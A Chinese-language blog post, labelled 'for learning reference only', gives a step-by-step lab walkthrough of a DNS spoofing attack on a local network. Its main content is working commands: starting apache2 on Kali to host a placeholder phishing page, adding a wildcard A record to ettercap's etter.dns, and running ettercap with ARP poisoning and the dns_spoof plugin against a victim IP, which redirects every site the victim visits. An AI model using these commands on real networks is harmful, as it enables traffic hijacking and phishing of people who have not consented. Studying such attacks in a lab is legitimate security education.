DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考)

DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站
(仅供学习参考)

情景要求:
同一局域网内
受害者IP:192.168.26.130
攻击者系统Kali Linux,IP地址:192.168.26.129
第一步:kali Linux打开apache2服务。
输入打开命令:service apache2 start
查看是否打开命令:service apache2 status
有小绿点就是已经打开了。
在这里插入图片描述
下一步:制作我们的钓鱼网页
命令如下:vi /var/www/html/index.html
有html5基础的小伙伴可制作制作
没有基础的可输入如下代码:

<html>
<head>
</head>
<body>
<a >你被黑了。</a>
</body>
</html>

如图:在这里插入图片描述
输入完成代码退出文本;
切换到受害者机子打开浏览器输入攻击者测试是否成功:
在这里插入图片描述
这些都测试没问题之后,到正题了。我们的目的是让受害者机子输入任何网站都显示我们制作的钓鱼网站。
回到攻击者机子kali linux
输入命令修改ettercap DNS文件;
命令如下:vi /etc/ettercap/etter.dns
修改如图在这里插入图片描述
添加:* A 192.168.26.129(也就是添加攻击者IP)添加完成退出文本;
还差最后一步了,
输入命令:ettercap -i eth0 -T -P dns_spoof -M arp /192.168.26.130///(IP是受害者的)
如图:在这里插入图片描述
然后我们回到受害者机子输入www.baidu.com测试是否跳转到我们制作的钓鱼网页。
如图测试成功:在这里插入图片描述

  • 6
    点赞
  • 67
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值